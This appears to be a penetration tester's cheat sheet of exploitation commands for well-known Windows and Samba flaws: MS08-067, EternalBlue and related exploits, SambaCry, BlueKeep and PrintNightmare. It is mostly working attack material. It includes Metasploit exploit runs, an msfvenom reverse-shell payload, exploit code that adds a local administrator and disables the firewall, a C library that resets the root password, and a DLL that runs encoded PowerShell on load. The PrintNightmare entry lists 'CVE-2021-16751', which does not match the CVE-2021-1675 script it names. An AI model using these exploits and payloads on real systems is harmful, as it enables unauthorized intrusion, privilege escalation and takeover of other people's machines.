Links

Low-Hanging Fruits

net_api

CVE-2008-4250, MS08-067
Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check
Exploit:
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalBlue

CVE-2017-0144, MS17-010

MSF

Check:
$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run
Exploit with:
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalRomance / EternalSynergy / EternalChampion

Exploit with ms17_010_psexec:
msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run
Exploit with ms17_010_command:
msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user snovvcrash Passw0rd! /add && net localgroup administrators snovvcrash /add"
msf > run

Manually

Send MSF payload and execute it with send_and_execute.py:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe
Or just execute commands on host via zzz_exploit.py (at least one named pipe must be accessible on target):
$ python zzz_exploit.py 192.168.1.11
zzz_exploit.py
# ...
def smb_pwn(conn, arch):
service_exec(conn, r'cmd /c net user snovvcrash Passw0rd! /add && cmd /c net localgroup administrators snovvcrash /add && cmd /c netsh firewall set opmode disable')
# ...
For x86 EternalBlue shellcodes use AutoBlue-MS17-010.
A patch for grabbing remote files from Victim:
$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch

FuzzBunch (Wine)

SambaCry

CVE-2017-7494 (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)

MSF

msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run

Manually

Compile .so SUID shared library:
pwn.c
// gcc -shared -fPIC -o pwn.so pwn.c
#include <stdio.h>
#include <stdlib.h>
static void pwn() __attribute__((constructor));
void pwn() {
setresuid(0,0,0);
system("echo 'root:Passw0rd!'|chpasswd");
}
Get real share path on the target's filesystem:
$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path: /home/snovvcrash/sharename
Upload pwn.so to target and then run the exploit:
$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7
$ source venv/bin/activate.sh
$ pip install -r requirements.txt
$ . venv/bin/activate
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''

BlueKeep

CVE-2019-0708
Check:
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run
Exploit:
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

PrintNightmare

CVE-2021-16751, CVE-2021-34527

Check

CrackMapExec

$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler

ItWasAllADream

$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'

Exploit

C/C++

RCE (fork of the original repo):
LPE:

Python

RCE:
Usage
  1. 1.
    Prepare an SMB share with anonymous authentication allowed (smbserver.py also works):
  2. 2.
    Generate an evil DLL: a С2 stager / add user to a privileged group (1, 2, 3, etc.) / invoke a custom command (see example below).
  3. 3.
    Run the exploit:
$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
pwn.c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
// Default function that is executed when the DLL is loaded
void Entry() {
system("powershell -enc <BASE64_PWSH_CODE>");
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

C#

RCE + LPE:

PowerShell

LPE:

Reproducibility

Flowchart by @wdormann:

Mitigation

Last modified 5mo ago